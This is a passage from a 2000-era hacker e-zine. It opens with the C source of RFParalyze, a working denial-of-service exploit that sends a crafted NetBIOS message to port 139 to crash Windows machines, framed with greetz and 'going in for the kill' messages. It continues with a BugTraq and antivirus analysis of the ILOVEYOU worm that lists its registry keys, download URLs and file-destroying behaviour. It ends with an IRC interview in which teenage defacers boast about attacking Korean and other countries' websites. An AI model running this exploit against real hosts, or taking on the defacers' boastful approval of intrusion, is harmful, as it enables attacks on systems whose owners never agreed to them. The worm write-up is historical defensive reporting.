I have only tested this code on Linux. Hey, at least it's
not in perl... ;) -rfp
*/
#include <stdio.h> /* It's such a shame to waste */
#include <stdlib.h> /* this usable space. Instead, */
#include <string.h> /* we'll just make it more */
#include <netdb.h> /* props to the men and women */
#include <sys/socket.h> /* (hi Tabi!) of #!adm and */
#include <sys/types.h> /* #!w00w00, because they rock */
#include <netinet/in.h> /* so much. And we can't forget*/
#include <unistd.h> /* our friends at eEye or */
#include <string.h> /* Attrition. Oh, +hi Sioda. :) */
/* Magic winpopup message
This is from \\Beav\beavis and says "yeh yeh"
Ron and Marty should like the hardcoded values this has ;)
*/
char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
"\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00";
struct sreq /* little structure of netbios session request */
{
char first[5];
char yoname[32];
char sep[2];
char myname[32];
char end[1];
};
void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/
int main(int argc, char *argv[]){
char buf[4000], myname[33], yoname[33];
struct sockaddr_in sin;
int sox, connex, x;
struct sreq smbreq;
printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n");
if (argc < 3) {
printf("Usage: RFParalyze <IP of target> <NetBIOS name>\n");
printf(" --IP must be ip address, not dns\n");
printf(" --NetBIOS name must be in UPPER CASE\n\n");
exit(1);}
printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n");
Pad_Name("WICCA",myname); /* greetz to Simple Nomad/NMRC */
myname[30]='A'; /* how was Beltaine? :) */
myname[31]='D';
Pad_Name(argv[2],yoname);
yoname[30]='A';
yoname[31]='D';
printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]);
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_family = AF_INET;
sin.sin_port = htons(139);
sox = socket(AF_INET,SOCK_STREAM,0);
if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){
perror("Problems connecting: ");
exit(1);}
memset(buf,0,4000);
memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /*various netbios stuffz*/
memcpy(smbreq.sep,"\x00\x20",2); /*no need to worry about*/
memcpy(smbreq.end,"\x00",1); /*what it does :) */
strncpy(smbreq.myname,myname,32);
strncpy(smbreq.yoname,yoname,32);
write(sox,&smbreq,72); /* send initial request */
x=read(sox,buf,4000); /* get their response */
if(x<1){ printf("Problem, didn't get response\n");
exit(1);}
if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill...");
else {printf("We didn't get back the A-OK, bailing.\n");
exit(1);}
write(sox,&blowup,72); /* send the magic message >:) */
x=read(sox,buf,4000); /* we really don't care, but sure */
close(sox);
printf("done\n");
}
void Pad_Name(char *name1, char *name2)
{ char c, c1, c2;
int i, len;
len = strlen(name1);
for (i = 0; i < 16; i++) {
if (i >= len) {
c1 = 'C'; c2 = 'A'; /* CA is a space */
} else {
c = name1[i];
c1 = (char)((int)c/16 + (int)'A');
c2 = (char)((int)c%16 + (int)'A');
}
name2[i*2] = c1;
name2[i*2+1] = c2;
}
name2[32] = 0; /* Put in the null ...*/
}
/*********************************** www.el8.org **** www.wiretrip.net **/
-/-\----/-\----/-\----/-\----/-\----/-\---/ fjear the ASCii skillz \---/-\-
@HWA
16.0 [MM] New worm: ILOVEYOU spreads via e-mail attachments
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This email worm originated in the Phillipines, when I first became aware
of it Britain was being hit hard by the nuisance, and by late afternoon
the same day it had proliferated across the net to the U.S and Canada
I got a call from my sister at work who had recieved 16 ILOVEYOU emails
at that time, later on the media began reporting it and in my news
emails that were warning of the virus the very same emails were themselves
infected and multiple copies were received.
Not 24hrs had passed before several variations of the insiduous pest had
appeared such as the JOKE and VERY FUNNY variations. You'd think we were
past this sort of annoyance but it seems shoddy programming and planning
is going to be a fact of life for a good while to come yet. - Ed
Media:
Source: http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000504095618.N24513@securityfocus.com
[ by Message ] [ by Thread ]
[ Post ][ Reply ]
To:BugTraq
Subject:ILOVEYOU worm
Date:Wed May 03 2000 18:56:18
Author: Elias Levy
Message-ID:<20000504095618.N24513@securityfocus.com>
A new VB worm is on the loose. This would normally not be bugtraq
material as it exploits no new flaws but it has spread enough that it
warrants some coverage. This is a quick and dirty analysis of what it does.
The worm spreads via email as an attachments and via IRC as a DCC download.
The first thing the worm does when executed is save itself to three
different locations. Under the system directory as MSKernel32.vbs and
LOVE-LETTER-FOR-YOU.TXT.vbs and under the windows directory as
Win32DLL.vbs.
It then creates a number of registry entries to execute these programs
when the machine restarts. These entries are:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
It will also modify Internet Explorer's start page to point to a web page
that downloads a binary called WIN-BUGSFIX.exe. It randomly selects between
four different URLs:
http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe
http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe
http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe
I've not been able to obtain copy of the binary to figure out what it does.
This does mean the worm has a dynamic components that may change its
behavior any time the binary is changed and a new one downloaded.
The worm then changes a number of registry keys to run the downloaded binary
and to clean up after itself.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
about:blank
The worm then creates an HTML file that helps it spread,
LOVE-LETTER-FOR-YOU.HTM. This is the file DCC'ed to others on IRC.
The worm then spreads to all addresses in the Windows Address Book by
sending the file LOVE-LETTER-FOR-YOU.TXT.vbs as an attachment. The
email starts:
kindly check the attached LOVELETTER coming from me.
Then the virus searches for attached drives looking for files with
certain extensions. It overwrites files ending with vbs, and vbe.
It overwrites files ending with js, jse, css, wsh, sct, and hta, and
then renames them to end with vbs. It overwrites files ending with jpg
and jpeg and appends .vbs to their name. It finds files with the name
mp3 and mp3, creates vbs files with the same name and sets the hidden
attribute in the original mp* files.
The it looks for the mIRC windows IRC client and overwrites the script.ini
file if found. It modifies this file to that it will DCC the
LOVE-LETTER-FOR-YOU.HTM file to any people that join a channel the
client is in.
You can find the source of the worm at:
http://www.securityfocus.com/templates/archive.pike?list=82&msg=3911840F.D7597030@thievco.com&part=.1
--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
-=-
I-Worm.LoveLetter
I-Worm.LoveLetter is Internet worm written in the scripting language "Visual Basic Script"
(VBS). It works only on computers on which the Windows Scripting Host (WSH) is installed. In
Windwos 98 and Windows 2000, WHS is installed by default. The worm performs destructive
actions and sends its copy bye E-mail.
Destructive actions
After starting from the VBS file the worm searches all files on all local and mapped network
drivers. For some extensions of filenames the worm does the following:
VBS, VBE:
Overwrites files with the worm body.
JS, JSE, CSS, VSH, HST, HTA:
Creates a new file with original filename and extention .VBS and deletes original file.
JPG, JPEG:
Creates new file with extention .VBS (adds this extention to old file name and extention) (i.e.
PIC1.JPG.VBS). Writes worm body to it and deletes original file.
MP2, MP3:
Creates a new file with extention .VBS (adds to old file name, see above for details). It writes
its body to it and sets thef file attribute "hidden" to the original file.
MIRC32.EXE, MLINK32.EXE, SCRIPT.INI, MIRC.HLP, MIRC.INI:
If one of these files was found the worm creates the file SCRIPT.INI in the directory were one of
the above files resides.
The worm also creates some files with its body in system directory.
MSKERNEL32.VBS, WIN32DLL.VBS, LOVE-LETTER-FOR-YOU.TXT.VBS
It sets appropriates keys in the system registry (Automatic run keys) with full names of files:
MSKernel32.vbs, Win32DLL.vbs
It adds system registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
Spreading via E-mail
The worm sends itself via E-mail. To achieve this the worm sends itself to each address from
address book. It works only when the email program Outlook 97/98/2000 is installed.
The letter's subject:
ILOVEYOU
Message body:
kindly check the attached LOVELETTER coming from me.
Attached file name:
LOVE-LETTER-FOR-YOU.TXT.vbs
The virus creates a HTML dropper in Windows system directory. The HTML dropper displays
the message:
This HTML file need ActiveX Control
To Enable to read this HTML file
- Please press 'YES' button to Enable ActiveX
After this the dropper creates the MSKERNEL32.VBS with the worm body and sets it for auto
execution from system registry.
@HWA
17.0 [HWA] May 4th 2000: SugarKing interviews ph33r the b33r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exclusive interview by HWA staff writer SugarKing
Contact him at: sugaking@gis.net
Or editor at: cruciphux@dok.org
Session Start: Thu May 04 21:15:55 2000
[21:15] *** Now talking in #vivalaresistance
[21:16] <p4ntera> lets do this
[21:16] <SugarKing> lock the channel
[21:16] <p4ntera> no one knows of it
[21:16] <p4ntera> i cant
[21:16] <p4ntera> lol
[21:16] <SugarKing> ok
[21:16] <SugarKing> heh
[21:16] <SugarKing> one sec bro
[21:16] <p4ntera> werd
[21:16] <SugarKing> talking to a chick on the phone:)
[21:17] <p4ntera> heh
[21:17] <p4ntera> hurry mon aint got much time
[21:17] <SugarKing> alright
[21:17] <SugarKing> logging now
[21:17] <SugarKing> aight
[21:17] <SugarKing> you guys don't have to answer anything
[21:17] <SugarKing> just say no comment:)
[21:17] <p4ntera> iight
<SNIP>
[21:17] <p4ntera> wtf
[21:17] <SugarKing> heh
[21:18] <Da_Pest> Whats up?
[21:18] <Da_Pest> Yo we gonna start?
[21:18] <SugarKing> so how long has ph33r the b33r been a group?
[21:18] <SugarKing> we're already starting:)
[21:18] <p4ntera> well
[21:18] <Da_Pest> Ok : )
[21:18] <p4ntera> i recruited people from the early october
[21:18] <p4ntera> so lets say october
[21:18] <SugarKing> ok...
[21:18] <Da_Pest> I joined probably in december or november
[21:18] <Da_Pest> Which one was it p4ntera?
[21:18] <p4ntera> november
[21:19] <Da_Pest> k
[21:19] <SugarKing> so you started the group, p4ntera?
[21:19] <p4ntera> yes
[21:19] <SugarKing> any reason?
[21:19] <p4ntera> well
[21:19] <SugarKing> and what's with the name?
[21:19] <p4ntera> because there wasn't much action going around in the underground
[21:19] <Da_Pest> LoL
[21:19] <Da_Pest> that name is joax
[21:19] <p4ntera> so
[21:19] <p4ntera> i wanted people to know the "scene" aint dead
[21:19] <p4ntera> the name?
[21:19] <p4ntera> lmao
[21:19] <p4ntera> well its a LONNNG story
[21:20] <Da_Pest> Very long
[21:20] <SugarKing> heh
[21:20] <p4ntera> yeah
[21:20] <Da_Pest> he told me once
[21:20] <Da_Pest> Dont wanna hear it again
[21:20] <p4ntera> u still wanna hear it?
[21:20] <SugarKing> nah that's ok
[21:20] <SugarKing> save some time
[21:20] <p4ntera> yeah
[21:20] <SugarKing> so how many members to date?
[21:20] <p4ntera> holy shit
[21:20] <p4ntera> loll
[21:20] <p4ntera> 14+
[21:20] <Da_Pest> 15?
[21:20] <p4ntera> most are just shadow members
[21:20] <p4ntera> who remain in the background
[21:20] <Da_Pest> Yah
[21:21] <Da_Pest> Wait let me think
[21:21] <Da_Pest> Yah 15 or 16 i can remember
[21:21] <SugarKing> that's alot
[21:21] <p4ntera> yeah
[21:21] <SugarKing> u guys know how many sites you've defaced so far?
[21:21] <p4ntera> next?
[21:21] <p4ntera> another holy shit =)
[21:21] <p4ntera> i would say 20+
[21:21] <Da_Pest> LoL
[21:21] <SugarKing> or don't keep count?
[21:21] <SugarKing> 20+?
[21:21] <p4ntera> yeah
[21:21] <SugarKing> I would say 40
[21:22] <Da_Pest> And many more to come
[21:22] <SugarKing> just guessing
[21:22] <SugarKing> heh
[21:22] <p4ntera> well
[21:22] <p4ntera> i dont wanna sound cocky
[21:22] <p4ntera> =)
[21:22] <SugarKing> why do you guys deface? fame?
[21:22] <p4ntera> nah
[21:22] <p4ntera> well i like to show people the underground aint dead
[21:22] <p4ntera> and well
[21:22] <p4ntera> some for fame too
[21:22] <p4ntera> but not all
[21:23] <SugarKing> what do you mean "the underground aint dead"?
[21:23] <Da_Pest> Yah i agree
[21:23] <p4ntera> hence why we havent defaced the higher up sites
[21:23] <p4ntera> well
[21:23] <p4ntera> look on attrition
[21:23] <p4ntera> mostly frontpage kiddies, or brazilian kids who cant speak
[21:23] <p4ntera> english
[21:23] <p4ntera> or both
[21:23] <SugarKing> hah ya
[21:23] <Da_Pest> MSADC GALORE
[21:23] <p4ntera> i say the 2 go together in the same sentence
[21:23] <Da_Pest> HAHA
[21:23] <p4ntera> da_pest, dont even give em that =)
[21:23] <Da_Pest> lol
[21:23] <Da_Pest> Tru dat
[21:24] <SugarKing> hah
[21:24] <p4ntera> next?
[21:24] <SugarKing> you guys afraid of being busted?
[21:24] <p4ntera> hell yeah
[21:24] <Da_Pest> Of course
[21:24] <p4ntera> i dont wanna have a friend named backdoor billy
[21:24] <SugarKing> then why do you keep defacing?
[21:24] <p4ntera> well
[21:24] <Da_Pest> You think i want bull shit on my record lol
[21:24] <p4ntera> we're in it now
[21:24] <p4ntera> we can't stop
[21:24] <p4ntera> plus i dont wanna
[21:25] <SugarKing> ya you can
[21:25] <SugarKing> I did
[21:25] <SugarKing> don't wanna? why?
[21:25] <p4ntera> i cover my tracks well, and i hide myself
[21:25] <p4ntera> i like defacing
[21:25] <Da_Pest> Plus we said we are afraid of gettin caught but i personally enjoy the rush of the chance of getting caught
[21:25] <Da_Pest> same
[21:25] <Da_Pest> :)
[21:25] <p4ntera> hes right
[21:25] <SugarKing> what about ethics?
[21:25] <p4ntera> well
[21:25] <SugarKing> i did it for awhile
[21:25] <p4ntera> i rarely do medical sites
[21:26] <SugarKing> but i don't think it's right
[21:26] <SugarKing> not needed
[21:26] <p4ntera> no msadc
[21:26] <SugarKing> eh
[21:26] <SugarKing> heh
[21:26] <p4ntera> and usually if i feel sorry for the admin
[21:26] <p4ntera> i give him the patch
[21:26] <SugarKing> if you feel sorry?
[21:26] <Da_Pest> I think its safe to say NT will be out of PTB for a bit eh p4ntera?
[21:26] <SugarKing> haha
[21:26] <p4ntera> thats right
[21:26] <p4ntera> but now we're going for countries
[21:27] <Da_Pest> Oh yah
[21:27] <SugarKing> countries?
[21:27] <p4ntera> as you might have saw, we raped korea pretty bad
[21:27] <p4ntera> =)
[21:27] <SugarKing> ya i noticed a bit
[21:27] <p4ntera> yeah
[21:27] <Da_Pest> Yah'
[21:27] <p4ntera> next is a country that everyone hates
[21:27] <p4ntera> we plan to finish it up tommorow (korean sites that is)
[21:27] <Da_Pest> Yah
[21:28] <SugarKing> what about others calling you guys script kiddies and indeed having script kiddies as members
[21:28] <Da_Pest> We gonna clean up the .kr tomorow eh p4ntera?
[21:28] <p4ntera> well
[21:28] <SugarKing> not to name any *cough*artech*cough*
[21:28] <SugarKing> :)
[21:28] <p4ntera> lets not get into artech
[21:28] <Da_Pest> Ok artech
[21:28] <Da_Pest> I d liek to say something about him
[21:28] <p4ntera> i consider a script kiddie someone who uses scripts and not knows what it actually does
[21:28] <Da_Pest> sorry like
[21:28] <SugarKing> go ahead:)
[21:28] <Da_Pest> Ok
[21:28] <Da_Pest> He is basically a frontpage KIDDY
[21:28] <p4ntera> yeah
[21:29] <SugarKing> yeah I noticed
[21:29] <SugarKing> aol kiddie
[21:29] <p4ntera> he doesnt even know what NTLM authentication is
[21:29] <p4ntera> or
[21:29] <p4ntera> how he uses the everyone/guest group to hack with frontpage
[21:29] <p4ntera> he just randomly tries sites
[21:29] <Da_Pest> He dissed p4ntera and I meanwhile we have our own ideas of hax0ring whil he does absolutly frontpage
[21:29] <p4ntera> which is pretty fucking lame
[21:29] <Da_Pest> Ok
[21:29] <Da_Pest> Go on attrition
[21:29] <Da_Pest> and look at his hacks
[21:29] <Da_Pest> Im pretty sure every one of them is NT
[21:29] <p4ntera> nah thats not important
[21:29] <SugarKing> yeah they are
[21:29] <p4ntera> lets move on to something else
[21:29] <SugarKing> i don't think he knows what linux is
[21:30] <p4ntera> NT can be raped other ways
[21:30] <Da_Pest> Yah
[21:30] <p4ntera> as u saw with what i did
[21:30] <Da_Pest> But he uses only frontpage
[21:30] <SugarKing> yeah
[21:30] <Da_Pest> Yep
[21:30] <p4ntera> that is correct
[21:30] <SugarKing> how many memebers code?
[21:30] <p4ntera> netbios is a weak fucking protocol
[21:30] <p4ntera> well
[21:30] <Da_Pest> LoL
[21:30] <p4ntera> 5-8
[21:30] <Da_Pest> Very very weak
[21:30] <SugarKing> you guys plan on releasing any exploits you may have written?
[21:30] <p4ntera> yeas
[21:30] <p4ntera> very soon
[21:30] <Da_Pest> Yep
[21:30] <p4ntera> we are probably gonna release some scanners
[21:30] <p4ntera> then maybe some exploits
[21:30] <Da_Pest> Yeah
[21:30] <SugarKing> cool
[21:31] <p4ntera> depends how much sexor i get in the next few days
[21:31] <SugarKing> hah
[21:31] <Da_Pest> LoL
[21:31] <Da_Pest> You know ill be getting sex0r from 3r1/\/ lol
[21:31] <SugarKing> so all members are generally kids? 15-18?
[21:31] <p4ntera> yeah muthafuckas
[21:31] <p4ntera> =)
[21:31] <p4ntera> no
[21:31] <Da_Pest> lol
[21:31] <p4ntera> we have some universty members
[21:31] <p4ntera> but none too old
[21:31] <p4ntera> none too young
[21:31] <SugarKing> oh
[21:31] <p4ntera> around your difference
[21:31] <p4ntera> as u said
[21:32] <SugarKing> what are you guys trying to prove by defacing?
[21:32] <SugarKing> anything?
[21:32] <p4ntera> like i said
[21:32] <p4ntera> the underground aint dead
[21:32] <p4ntera> and
[21:32] <p4ntera> that we, as kids, will not take the bullshit the media spews forth
[21:32] <p4ntera> about hackers and the like
[21:32] <SugarKing> yeah
[21:33] <Da_Pest> Yep
[21:33] <SugarKing> hmm
[21:33] <Da_Pest> I dont like the stereo types
[21:33] <SugarKing> do you guys have a site?
[21:33] <p4ntera> not yet
[21:33] <p4ntera> we will have one, one of our members needs 2 way cable
[21:33] <p4ntera> :P
[21:33] <p4ntera> www.b33r.com soon
[21:33] <SugarKing> heheh cool
[21:33] <Da_Pest> Plus we dont even really need one as of this monet
[21:34] <Da_Pest> moment
[21:34] <SugarKing> ya
[21:34] <Da_Pest> errr.....
[21:34] <SugarKing> do you guys plan on ever stop defacing?
[21:34] <Da_Pest> Me No!
[21:34] <Da_Pest> Well not for a while at least
[21:35] <SugarKing> p4ntera?
[21:35] <Da_Pest> He is afk
[21:35] <SugarKing> oh
[21:35] <Da_Pest> he is walkin his dog for a sec
[21:35] <SugarKing> hah ok
[21:35] <Da_Pest> He will brb
[21:35] <Da_Pest> :)
[21:35] <SugarKing> i hate dogs
[21:35] <SugarKing> they're Pest's:P
[21:35] <Da_Pest> Why?
[21:35] <Da_Pest> Like me : )
[21:35] <SugarKing> ya
[21:36] <Da_Pest> I lub puppys
[21:36] <Da_Pest> :)
[21:36] <Da_Pest> U gots any other questions?
[21:36] <SugarKing> ya, i'm waiting for p4ntera though
[21:36] <Da_Pest> Oh ok
[21:37] *** p4ntera has quit IRC (Ping timeout)
[21:37] <SugarKing> hrm
[21:37] <SugarKing> he'll be back
[21:38] <Da_Pest> Yah
[21:38] <SugarKing> so do you use different handles on IRC because you're afraid of getting caught?
[21:38] <Da_Pest> Not so much getting caught just the fact i dont want to be bothered
[21:39] <Da_Pest> I dont want some kid to see my defacements and bug me on irc
[21:39] <SugarKing> ya
[21:39] <SugarKing> how'd you meet p4ntera?
[21:39] <Da_Pest> but partly because of the illegal activities factor =
[21:39] <Da_Pest> Honestly we live about a few blocks away from eachother
[21:40] <SugarKing> hah cool
[21:40] <Da_Pest> Yah
[21:40] <SugarKing> do you guys talk about your defacements and shit in school?
[21:41] <Da_Pest> Well we dont have any of the same classes!But if something big is goign down we meet in between classes just to enlighten eachother kinda
[21:41] <Da_Pest> Shit sorry for my spelling
[21:41] <Da_Pest> Im just really cold
[21:41] <SugarKing> do your friends know that you guys are into computers?
[21:41] <SugarKing> heh
[21:41] <SugarKing> it's aight
[21:42] <Da_Pest> Umm... Well some do but I dont think any know im into defacing
[21:42] <Da_Pest> Me and p4ntera are the only ones out of my cru that are into this shit
[21:42] <SugarKing> ya
[21:43] <SugarKing> same as me and Clientel
[21:43] <Da_Pest> cool
[21:43] <SugarKing> we have one class together and he doesn't shut the hell up
[21:43] <Da_Pest> LoL
[21:43] <Da_Pest> What does he talk about?
[21:44] <SugarKing> about his elite defacements
[21:44] <SugarKing> haha nah
[21:44] <Da_Pest> brb man im gonna log on a nother server im lagged
[21:44] <SugarKing> he talks about computers in general
[21:44] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?)
[21:44] <SugarKing> aight
[21:45] *** Da_Pest (****@********.***) has joined #vivalaresistance
[21:45] <Da_Pest> Back!
[21:46] <SugarKing> ok
[21:46] <SugarKing> where the hell is p4ntera?
[21:46] <Da_Pest> He walking his damn dog
[21:46] <SugarKing> i'll kill it
[21:46] <Da_Pest> Sorry bout the wait
[21:46] <Da_Pest> LoL
[21:46] <Da_Pest> he should be here soon
[21:47] <SugarKing> ok
[21:47] <Da_Pest> sorry for the wait
[21:47] <SugarKing> np
[21:48] <Da_Pest> do u code?
[21:48] <SugarKing> yup
[21:48] <SugarKing> btw, to set the record, since i'm logging and it's going to be posted
[21:48] <SugarKing> I left this group because it was only defacing
[21:49] <SugarKing> I didn't want to do it no more
[21:49] <Da_Pest> Ok...
[21:49] <SugarKing> I'll keep my opinion about defacing to myself
[21:49] <Da_Pest> Why not?
[21:49] <SugarKing> but, I'd rather code some nasty shit:)
[21:49] <Da_Pest> ok gitcha
[21:49] <Da_Pest> Alot of people dont like defacing
[21:50] <Da_Pest> But the way I see it...
[21:50] <SugarKing> I don't see a need for it
[21:50] <Da_Pest> If you work fucking hard on a tight ass OBSD server and you been workin on it forever then I think you deserve the credit and so people can see your work
[21:51] *** p4ntera (****@****.*********.******.***.***) has joined #vivalaresistance
[21:51] <SugarKing> wb
[21:51] <SugarKing> dog walker:P
[21:51] <p4ntera> thanks
[21:51] <p4ntera> sorry about that
[21:51] <p4ntera> hah
[21:51] <Da_Pest> Yah wb
[21:51] <p4ntera> yeah man your mom is rough with the leash
[21:51] <p4ntera> she keeps on bitin git
[21:51] <Da_Pest> loil
[21:51] <p4ntera> *biting it
[21:51] <SugarKing> anyways
[21:51] <p4ntera> =)
[21:51] <SugarKing> back to the question
[21:51] <SugarKing> do you guys plan on ever stop defacing?
[21:51] <p4ntera> yeah anyways
[21:51] <p4ntera> maybe
[21:51] <p4ntera> when some of us gets booked
[21:52] <p4ntera> or we own the world
[21:52] <Da_Pest> LoL
[21:52] <p4ntera> which ever one comes first
[21:52] <SugarKing> heh
[21:52] <Da_Pest> Me never I wont stop
[21:52] <p4ntera> yeah he well
[21:52] <p4ntera> *will
[21:52] <Da_Pest> I enjoy it
[21:52] <p4ntera> i would just like to add something?
[21:52] <p4ntera> if thats alright?
[21:52] <SugarKing> go ahead
[21:52] <SugarKing> you got the floor:)
[21:52] <Da_Pest> I will never stop hax0ring and if i do good work thhen I believe it should not go unnoticed
[21:52] <p4ntera> you asked whats with the "underground aint dead part"
[21:52] <SugarKing> ya
[21:52] <p4ntera> well
[21:52] <p4ntera> if u noticed last year
[21:53] <p4ntera> groups like gH,irc.psychic.com and h4g15 were defacing major websites
[21:53] <SugarKing> ya
[21:53] <p4ntera> showing there weak security
[21:53] <p4ntera> now we got people like "crime boys" and artech defacing websites
[21:53] <Da_Pest> Exactly
[21:53] <p4ntera> and these are the people that will protect potentially high up websites?
[21:53] <p4ntera> i dont want my bank card protected by these frontpage kiddies
[21:54] <Da_Pest> Ok course
[21:54] <p4ntera> u know what i mean?
[21:54] <SugarKing> yah
[21:54] <Da_Pest> and the sad part is alot of admins are like that
[21:54] <SugarKing> true in a sense
[21:54] <p4ntera> yeah thats right they are
[21:54] <Da_Pest> And i mean alot
[21:54] <SugarKing> but what about groups like L0pht, who made their fame without defacing?
[21:54] <p4ntera> well
[21:54] <p4ntera> they were made in the 80's
[21:54] <Da_Pest> Like look at all of artechs for god sakes
[21:54] <p4ntera> when defacing was unheard of
[21:55] <p4ntera> bbs hacking
[21:55] <SugarKing> what about now?
[21:55] <p4ntera> they did do the potentially "dark" side of hacking
[21:55] <SugarKing> they could easily deface now
[21:55] <p4ntera> yeah but they outgrown that
[21:55] <p4ntera> its kind of a teenage thing
[21:55] <SugarKing> so you saying you're gonna outgrow it?
[21:55] <p4ntera> fuck when i heard mosthated was 19 i was shocked
[21:55] <p4ntera> eventually
[21:55] <SugarKing> heh
[21:55] <SugarKing> ya
[21:56] <Da_Pest> I dont think I will
[21:56] <Da_Pest> until i get booked
[21:56] <p4ntera> yeah he will
[21:56] <p4ntera> heh
[21:56] <p4ntera> anyways
[21:56] <Da_Pest> Umm...
[21:56] <Da_Pest> No
[21:56] <SugarKing> in my last interview (team echo) one member said (remain nameless) hacking is something that just eventually progresses
[21:56] <p4ntera> yeah
[21:56] <SugarKing> which is true
[21:56] <p4ntera> funny thing is
[21:56] <Da_Pest> Tru dat
[21:56] <p4ntera> we have 2 members of team echo
[21:56] <p4ntera> in our group
[21:56] <p4ntera> nameless of course
[21:56] <SugarKing> ya I know
[21:56] <Da_Pest> hehe =)
[21:56] <p4ntera> well, had
[21:56] <SugarKing> had?
[21:56] <p4ntera> one got booked
[21:56] <SugarKing> they left?
[21:57] <SugarKing> who?
[21:57] <p4ntera> another one is still in
[21:57] <p4ntera> Analognet
[21:57] <SugarKing> Analognet was in ph33r the b33r?
[21:57] <p4ntera> yep
[21:57] <Da_Pest> :)
[21:57] <p4ntera> dont be so shocked
[21:57] <SugarKing> i didn't know
[21:57] <p4ntera> u know who taught him how to hack nt?
[21:57] <p4ntera> your talking to him right now
[21:57] <SugarKing> heh
[21:57] <p4ntera> he learned very fast
[21:57] <Da_Pest> p4ntera is truly 1337 sh1t lol
[21:57] <p4ntera> within a month he knew what i knew
[21:57] <Da_Pest> He taught me alot
[21:58] <p4ntera> and became a nt admin
[21:58] <p4ntera> damn right negro
[21:58] <SugarKing> cool
[21:58] <p4ntera> =)
[21:58] <Da_Pest> I think as a group we are progressing
[21:58] <p4ntera> i totally agree
[21:58] <p4ntera> 100%
[21:58] <SugarKing> so anything we should know about with the future of ph33r the b33r?
[21:58] <p4ntera> yeah
[21:58] <Da_Pest> We are slowly moving are way up to bigger and better things
[21:58] <p4ntera> we are going to be big
[21:58] <p4ntera> as da_pest is saying
[21:59] <Da_Pest> And eventually we are gonna pull a gH and own a big ass site
[21:59] <p4ntera> we are the only thing that comes close to a good group
[21:59] <p4ntera> of course
[21:59] <Da_Pest> And that will be a grand finale
[21:59] <p4ntera> my boys wkD are there with us
[21:59] <Da_Pest> Yah
[21:59] <SugarKing> oh yeah also...don't you think it's dangerous by just randomly pulling in people in the group who could possible be a fed?
[21:59] <p4ntera> werd ka0x and BlazinWeed =)
[21:59] <p4ntera> no
[21:59] <p4ntera> i know my rights
[21:59] <p4ntera> too well in fact
[21:59] <Da_Pest> Same
[21:59] <p4ntera> entrapment is a beautifal thing my friend
[21:59] <p4ntera> =)
[22:00] <Da_Pest> Plus we make sure people are legit before they join
[22:00] <p4ntera> and thats why we hang on lame networks
[22:00] <SugarKing> any last comments? shout out's? flames?
[22:00] <p4ntera> cause efnet is like 98% sniffed
[22:00] <p4ntera> well
[22:00] <p4ntera> i would like to say to sinfony, aka john dough
[22:00] <Da_Pest> lol
[22:00] <Da_Pest> DIE
[22:00] <p4ntera> that i respect his skills
[22:00] <p4ntera> i recently found out he is r3p3nt from dhc, which kinda sucks for me
[22:00] <p4ntera> because i respect dhc as a group
[22:00] <p4ntera> and him especially
[22:01] <p4ntera> even though he flamed us
[22:01] <p4ntera> he has his skills
[22:01] <p4ntera> but he is still a ass
[22:01] <p4ntera> that will likely never change
[22:01] <Da_Pest> hehe :)
[22:01] <SugarKing> heh
[22:01] <SugarKing> anything from you, Pest?
[22:01] <Da_Pest> He is a bigger ass then m4rth4 lol
[22:01] <Da_Pest> Yah i just gotta say look out bitches cause PTB Is climbing our way up
[22:01] <p4ntera> heh
[22:02] <Da_Pest> And soon we will not be able to be touched
[22:02] <p4ntera> i would like to say some more as well
[22:02] <p4ntera> that is right
[22:02] <p4ntera> these 3rd world countries are our playgrounds
[22:02] <p4ntera> once we master our abilities, we are coming for the higher ups
[22:02] <Da_Pest> Yah
[22:02] <SugarKing> that it?:)
[22:02] <p4ntera> once we recruit some more members, we are coming
[22:02] <p4ntera> you cannot stop it
[22:02] <p4ntera> no one can =)
[22:02] <Da_Pest> Oh Yah
[22:03] <p4ntera> and
[22:03] <p4ntera> i would like to say
[22:03] <p4ntera> Sugarking is one sexy cum muffin
[22:03] <p4ntera> =)
[22:03] <SugarKing> hahah
[22:03] <SugarKing> thanks for the interview d00dz
